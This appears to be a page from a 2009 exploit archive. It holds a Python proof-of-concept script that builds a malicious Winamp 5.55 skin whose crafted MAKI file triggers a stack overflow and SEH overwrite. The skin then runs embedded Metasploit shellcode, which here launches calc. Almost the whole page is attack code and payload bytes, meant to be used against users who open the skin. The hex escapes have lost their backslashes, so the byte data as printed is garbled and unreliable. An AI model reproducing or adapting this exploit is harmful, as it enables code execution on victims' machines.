Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
# Published : 2009-05-22
# Author : His0k4
# Previous Title : PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)
# Next Title : Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploitn"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.htmln"
print " Exploit code: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.comn"
print " Serra7 Merra7,Koulchi Mderra7n"
print "**************************************************************************"

import os

header1=(
"x46x47x03x04x17x00x00x00x27x00x00x00x71x49x65x51x87x0dx51x4a"
"x91xe3xa6xb5x32x35xf3xe7x64x0fxf5xd6xfax93xb7x49x93xf1xbax66"
"xefxaex3ex98x7bxc4x0dxe9x0dx84xe7x4axb0x2cx04x0bxd2x75xf7xfc"
"xb5x3ax02xb2x4dx43xa1x4bxbexaex59x63x75x03xf3xc6x78x57xc6x87"
"x43xe7xfex49x85xf9x09xccx53x2axfdx56x65x36x60x38x1bx46xa7x42"
"xaax75xd8x3fx66x67xbfx73xf4x7ax78xf4xbbxb2xf7x4ex9cxfbxe7x4b"
"xa9xbexa8x8dx02x0cx37x3axbfx3cx9fx43x84xf1x86x88x5bxcfx1ex36"
"xb6x5bx0cx5dxe1x7dx1fx4bxa7x0fx8dx16x59x94x19x41x99xe1xe3x4e"
"x36xc6xecx4bx97xcdx78xbcx9cx86x28xb0xe5x95xbex45x72x20x91x41"
"x93x5cxbbx5fxf9xf1x17xfdx4ex6dx90x60x7ex53x2ex48xb0x04xccx94"
"x61x88x56x72xc0xbcx3ax40x22x6fxd6x4bx8bxa4x10xc8x29x93x25x47"
"x4dx3exaax97xd0xf4xa8x4fx81x7bx0axf2x2ax45x49x83xfaxbbxe4x64"
"xf4x81xd9x49xb0xc0xa8x5bx2exc3xbcxfdx3fx5exb6x62x5ex37x8dx40"
"x8dxeax76x81x4axb9x1bx77xbex97x4fxcexb0x77x19x4ex99x56xd4x98"
"x33xc9x6cx27x0dx20xc2xa8xebx51x2ax4bxbax7fx5dx4bxc6x5dx4cx71"
"x38xbax1ex8dx9ex48x3ex48xb9x60x8dx1fx43xc5xc4x05x40xc9x08x0f"
"x39xafx23x4bx80xf3xb8xc4x8fx7exbbx59x72x86xaaxefx0ex31xfax41"
"xb7xdcx85xa9x52x5bxcbx4bx44x32xfdx7dx51x37x7cx4exbfx40x82xae"
"x5fx3axdcx33x15xfaxb9x5ax7dx9ax57x45xabxc8x65x57xa6xc6x7cxa9"
"xcdxddx8ex69x1ex8fxecx4fx9bx12xf9x44xf9x09xffx45x27xcdx64x6b"
"x26x5ax4bx4cx8cx59xe6xa7x0cxf6x49x3axe4x05xcbx6dxc4x8axc2x48"
"xb1x93x49xf0x91x0exf5x4axffxcfxdcxb4xfex81xccx4bx96x1bx72x0f"
"xd5xbex0fxffxe1x8cxe2x01x59xb0xd5x11x97x9fxe4xdex6fx51x76x0a"
"xbdxf8xf0x80xa5x1bxa6x42xa0x93x32x36xa0x0cx8dx4ax1bx34x2ex9b"
"x98x6cxfax40x8bx85x0cx1bx6exe8x94x05x71x9bxd5x36xfdx03xf8x4a"
"x97x95x05x02xb7xdbx26x7ax10xf2xd5x7fxc4xacxdfx48xa6xa0x54x51"
"x57x6cxdcx76x35xa5xbaxb5xb3x05xcbx4dxadxc1xe6x18xd2x8fx68x96"
"xc1xfex29x61xb7xdax51x4dx91x65x01xcax0cx1bx70xdbxf7x14x95xd5"
"x36xedxe8x45x98x0fx3fx4exa0x52x2cxd9x82x4bx3bx9bx7ax66x0ex42"
"x8fxfcx79x41x15x80x9cx02x99x31xedxc7x19x53x98x47x98x63x60xb1"
"x5ax29x8cxaax4dxc1xbbxe2xf6x84x73x41xbdxb3xb2xebx2fx66x55x50"
"x94x05xc0x73x1fx96x1bx40x9bx1bx67x24x27xacx41x65x0ex00x00x00"
"x01x01x00x00xabxb0")
	
		
header2=(
"x01x01x00x00x0bx00x67x65x74x53x6bx69x6ex4ex61x6dx65x01x01x00"
"x00x0dx00x67x65x74x50x72x69x76x61x74x65x49x6ex74x01x01x00x00"
"x0cx00x67x65x74x54x69x6dx65x4fx66x44x61x79x01x01x00x00x0dx00"
"x73x65x74x50x72x69x76x61x74x65x49x6ex74x01x01x00x00x0ax00x6d"
"x65x73x73x61x67x65x42x6fx78x01x01x00x00x0fx00x69x6ex74x65x67"
"x65x72x54x6fx53x74x72x69x6ex67x01x01x00x00x0ex00x6fx6ex53x63"
"x72x69x70x74x4cx6fx61x64x65x64x01x01x00x00x0ex00x67x65x74x53"
"x63x72x69x70x74x47x72x6fx75x70x0ax01x00x00x09x00x67x65x74x4f"
"x62x6ax65x63x74x17x01x00x00x0bx00x6fx6ex4cx65x66x74x43x6cx69"
"x63x6bx01x01x00x00x12x00x6ex61x76x69x67x61x74x65x55x72x6cx42"
"x72x6fx77x73x65x72x01x01x00x00x19x00x67x65x74x50x6cx61x79x49"
"x74x65x6dx4dx65x74x61x44x61x74x61x53x74x72x69x6ex67x01x01x00"
"x00x17x00x67x65x74x50x6cx61x79x49x74x65x6dx44x69x73x70x6cx61"
"x79x54x69x74x6cx65x1fx00x00x00x01x01x00x00x00x00x00x00x00x00"
"x00x00x01x01x02x00x00x00x00x00x00x00x00x00x00x00x01x00x02x00"
"x00x00x00x00x00x00x00x00x00x00x01x00x04x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x02x00x00x00x02x00x00x00x00x00x00x00x00x00"
"x02x00x00x00xffxffx00x00x00x00x00x00x00x00x02x00x00x00x01x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x02x00x00x00x88x13x00x00x00x00x00x00x00x00x06x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x17x01x00x00"
"x00x00x00x00x00x00x00x00x01x00x06x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x0ex00x00x00x07x00x00x00x0cx00x72x75x6ex74x69x6d"
"x65x63x68x65x63x6bx0cx00x00x00x15x00x54x68x69x73x20x73x63x72"
"x69x70x74x20x72x65x71x75x69x72x65x73x20x0dx00x00x00x1fx00x57"
"x69x6ex61x6dx70x20x35x2ex35x34x20x28x73x6bx69x6ex20x76x65x72"
"x73x69x6fx6ex20x31x2ex33x34x29x0ex00x00x00x05x00x45x72x72x6f"
"x72x0fx00x00x00x00x00x11x00x00x00x05x00x44x45x42x55x47x14x00"
"x00x00x0ax00x6ex6fx77x70x6cx61x79x69x6ex67x16x00x00x00x12x00"
"x77x69x6ex73x68x61x64x65x69x63x6fx6ex6dx6fx64x65x72x6ex18x00"
"x00x00x31x00x68x74x74x70x3ax2fx2fx63x6cx69x65x6ex74x2ex77x69"
"x6ex61x6dx70x2ex63x6fx6dx2fx6ex6fx77x70x6cx61x79x69x6ex67x2f"
"x61x72x74x69x73x74x2fx3fx69x63x69x64x3dx19x00x00x00x0cx00x26"
"x61x72x74x69x73x74x4ex61x6dx65x3dx1ax00x00x00x06x00x61x72x74"
"x69x73x74x1cx00x00x00x0bx00x75x76x6fx78x2fx61x72x74x69x73x74"
"x1dx00x00x00x0ax00x63x62x73x2fx61x72x74x69x73x74x1ex00x00x00"
"x0bx00x73x74x72x65x61x6dx74x69x74x6cx65x02x00x00x00x00x00x00"
"x00x07x00x00x00x53x01x00x00x13x00x00x00x0ax00x00x00x86x01x00"
"x00xd1x02x00x00x01x03x00x00x00x01x00x00x00x00x18x00x00x00x00"
"x30x02x01x03x00x00x00x01x04x00x00x00x0cx01x03x00x00x00x01x05"
"x00x00x00x0ax51x10xb9x00x00x00x01x02x00x00x00x01x06x00x00x00"
"x30x02x01x09x00x00x00x01x00x00x00x00x01x08x00x00x00x01x07x00"
"x00x00x01x00x00x00x00x18x01x00x00x00x18x02x00x00x00x30x02x01"
"x0ax00x00x00x01x00x00x00x00x18x03x00x00x00x30x02x01x0ax00x00"
"x00x01x09x00x00x00x41x01x0bx00x00x00x0cx01x09x00x00x00x01x0a"
"x00x00x00x0cx50x10x06x00x00x00x01x08x00x00x00x21x01x00x00x00"
"x00x01x00x00x00x00x18x03x00x00x00x01x07x00x00x00x01x00x00x00"
"x00x18x01x00x00x00x18x04x00x00x00x02x01x00x00x00x00x01x0fx00"
"x00x00x01x06x00x00x00x01x0ex00x00x00x01x0cx00x00x00x01x0dx00"
"x00x00x40x18x05x00x00x00x02x01x08x00x00x00x21x01x06x00x00x00"
"x21x01x01x00x00x00x21x03x10x00x00x00x01x00x00x00x00x01x0fx00"
"x00x00x01x08x00x00x00x01x11x00x00x00x01x10x00x00x00x70x05x00"
"x00x00x04x02x01x01x00x00x00x21x03x12x00x00x00x01x00x00x00x00"
"x01x0fx00x00x00x01x08x00x00x00x01x11x00x00x00x01x00x00x00x00"
"x01x12x00x00x00x70x06x00x00x00x01x70x05x00x00x00x04x02x01x01"
"x00x00x00x21x19xa8xfexffxffx11x06x00x00x00x01x01x00x00x00x21"
"x01x13x00x00x00x01x00x00x00x00x70x08x00x00x00x00x01x14x00x00"
"x00x70x09x00x00x00x01x30x02x01x01x00x00x00x21x01x02x00x00x00"
"x10x06x00x00x00x01x01x00x00x00x21x01x15x00x00x00x19x4dx00x00"
"x00x30x02x01x15x00x00x00x01x0fx00x00x00x08x10x06x00x00x00x01"
"x01x00x00x00x21x01x17x00x00x00x01x16x00x00x00x30x02x01x00x00"
"x00x00x01x18x00x00x00x01x17x00x00x00x40x01x19x00x00x00x40x01"
"x15x00x00x00x40x70x0bx00x00x00x01x02x01x01x00x00x00x21x01x1b"
"x00x00x00x01x00x00x00x00x01x1ax00x00x00x70x0cx00x00x00x01x30"
"x02x01x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00"
"x00x00x01x00x00x00x00x01x1cx00x00x00x70x0cx00x00x00x01x30x02"
"x01x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00x00"
"x00x01x00x00x00x00x01x1dx00x00x00x70x0cx00x00x00x01x30x02x01"
"x1bx00x00x00x01x0fx00x00x00x08x10x17x00x00x00x01x1bx00x00x00"
"x01x00x00x00x00x01x1ex00x00x00x70x0cx00x00x00x01x30x02x01x1b"
"x00x00x00x01x0fx00x00x00x08x10x12x00x00x00x01x1bx00x00x00x01"
"x00x00x00x00x70x0dx00x00x00x00x30x02x01x1bx00x00x00x21x01x01"
"x00x00x00x21x21x01x01x00x00x00x21x21x01x01x00x00x00x21x21x01"
"x01x00x00x00x21x21x01x01x00x00x00x21x21x01x01x00x00x00x21x21"
"x01x01x00x00x00x21")


skin_xml=(
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64"
"x69x6ex67x3dx22x55x54x46x2dx38x22x20x73x74x61x6ex64x61x6cx6fx6ex65x3dx22x79"
"x65x73x22x3fx3ex0dx0ax0dx0ax3cx57x69x6ex61x6dx70x41x62x73x74x72x61x63x74x69"
"x6fx6ex4cx61x79x65x72x20x76x65x72x73x69x6fx6ex3dx22x31x2ex33x34x22x3ex0dx0a"
"x09x3cx73x6bx69x6ex69x6ex66x6fx3ex0dx0ax09x09x3cx76x65x72x73x69x6fx6ex3ex31"
"x2ex32x3cx2fx76x65x72x73x69x6fx6ex3ex0dx0ax09x09x3cx6ex61x6dx65x3ex42x65x6e"
"x74x6fx3cx2fx6ex61x6dx65x3ex0dx0ax09x09x3cx61x75x74x68x6fx72x3ex48x69x73x30"
"x6bx34x3cx2fx61x75x74x68x6fx72x3ex0dx0ax09x09x3cx63x6fx6dx6dx65x6ex74x3ex48"
"x69x73x30x6bx34x3cx2fx63x6fx6dx6dx65x6ex74x3ex0dx0ax09x09x3cx65x6dx61x69x6c"
"x3ex48x69x73x30x6bx34x2ex68x6cx6dx40x67x6dx61x69x6cx2ex63x6fx6dx3cx2fx65x6d"
"x61x69x6cx3ex0dx0ax09x09x3cx73x63x72x65x65x6ex73x68x6fx74x3ex48x69x73x30x6b"
"x34x2ex70x6ex67x3cx2fx73x63x72x65x65x6ex73x68x6fx74x3ex0dx0ax09x09x3cx68x6f"
"x6dx65x70x61x67x65x3ex68x74x74x70x3ax2fx2fx77x77x77x2ex73x6ex61x6bx65x73x70"
"x63x2ex63x6fx6dx2fx3cx2fx68x6fx6dx65x70x61x67x65x3ex0dx0ax09x3cx2fx73x6bx69"
"x6ex69x6ex66x6fx3ex0dx0ax0dx0ax09x3cx61x63x63x65x6cx65x72x61x74x6fx72x73x20"
"x73x65x63x74x69x6fx6ex3dx22x67x65x6ex65x72x61x6cx22x3ex0dx0ax09x09x3cx61x63"
"x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74x2bx46x22x20x61x63"
"x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx46x49x4cx45x22x20x2fx3e"
"x0dx0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6c"
"x74x2bx50x22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx50"
"x4cx41x59x22x20x2fx3ex0dx0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62"
"x69x6ex64x3dx22x41x6cx74x2bx4fx22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48"
"x4fx54x4bx45x59x5fx4fx50x54x49x4fx4ex53x22x20x2fx3ex0dx0ax09x09x3cx61x63x63"
"x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74x2bx49x22x20x61x63x74"
"x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx56x49x45x57x22x20x2fx3ex0d"
"x0ax09x09x3cx61x63x63x65x6cx65x72x61x74x6fx72x20x62x69x6ex64x3dx22x41x6cx74"
"x2bx48x22x20x61x63x74x69x6fx6ex3dx22x4dx45x4ex55x48x4fx54x4bx45x59x5fx48x45"
"x4cx50x22x20x2fx3ex0dx0ax09x3cx2fx61x63x63x65x6cx65x72x61x74x6fx72x73x3ex0d"
"x0ax0dx0ax09x3cx61x63x63x65x6cx65x72x61x74x6fx72x73x20x73x65x63x74x69x6fx6e"
"x3dx22x6ex6fx72x6dx61x6cx22x3ex0dx0ax09x09x09x3cx61x63x63x65x6cx65x72x61x74"
"x6fx72x20x62x69x6ex64x3dx22x73x70x61x63x65x22x20x61x63x74x69x6fx6ex3dx22x53"
"x48x4fx57x5fx43x55x52x52x45x4ex54x5fx54x52x41x43x4bx22x20x2fx3ex0dx0ax09x3c"
"x2fx61x63x63x65x6cx65x72x61x74x6fx72x73x3ex0dx0ax0dx0ax09x3cx21x2dx2dx20x54"
"x68x69x73x20x53x6bx69x6ex20x75x73x65x73x20x73x68x61x72x65x64x20x47x72x61x70"
"x68x69x63x73x2cx20x58x4dx4cx20x61x6ex64x20x4dx61x6bx69x20x66x72x6fx6dx20x27"
"x42x69x67x20x42x65x6ex74x6fx27x20x2dx2dx3ex0dx0ax0dx0ax09x3cx73x63x72x69x70"
"x74x73x3ex0dx0ax09x09x3cx73x63x72x69x70x74x20x66x69x6cx65x3dx22x2fx73x63x72"
"x69x70x74x73x2fx32x37x2ex6dx61x6bx69x22x20x70x61x72x61x6dx3dx22x73x6dx61x6c"
"x6cx22x2fx3ex20x3cx21x2dx2dx20x4dx75x73x74x20x62x65x20x6cx6fx61x64x65x64x20"
"x61x74x20x66x69x72x73x74x20x2dx2dx3ex0dx0ax09x3cx2fx73x63x72x69x70x74x73x3e"
"x0dx0ax0dx0ax3cx2fx57x69x6ex61x6dx70x41x62x73x74x72x61x63x74x69x6fx6ex4cx61"
"x79x65x72x3e")

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x30x42x50x4bx38x45x44x4ex53x4bx48x4ex47"
"x45x30x4ax57x41x50x4fx4ex4bx48x4fx54x4ax31x4bx38"
"x4fx55x42x32x41x30x4bx4ex49x54x4bx58x46x33x4bx48"
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x32x46x30x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx44"
"x4bx58x4fx55x4ex51x41x50x4bx4ex4bx58x4ex51x4bx48"
"x41x30x4bx4ex49x48x4ex45x46x32x46x30x43x4cx41x53"
"x42x4cx46x46x4bx58x42x54x42x33x45x58x42x4cx4ax57"
"x4ex30x4bx58x42x34x4ex50x4bx48x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x30x4bx48x42x38x42x4b"
"x42x30x42x30x42x30x4bx58x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x46x48x45x49x58x4ax4fx43x38x42x4cx4bx47"
"x42x35x4ax46x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex56x43x46x42x50x5a")

payload = "x41"*16756
payload += "x74x06x90x90"
payload += "x32x55xF0x12" # universal p/p/r in_mod.dll
payload += shellcode
	
try:
    os.mkdir("dz_skin")
    os.mkdir("dz_skin/scripts")
    out_maki = open(r'dz_skin/scripts/27.maki', 'w')
    out_maki.write(header1+payload+header2)
    out_maki.close()
    out_xml = open(r'dz_skin/skin.xml', 'w')
    out_xml.write(skin_xml)
    out_xml.close()
    raw_input("nSkin's files created!n")
except:
    print "Error"

# www.Syue.com [2009-05-22]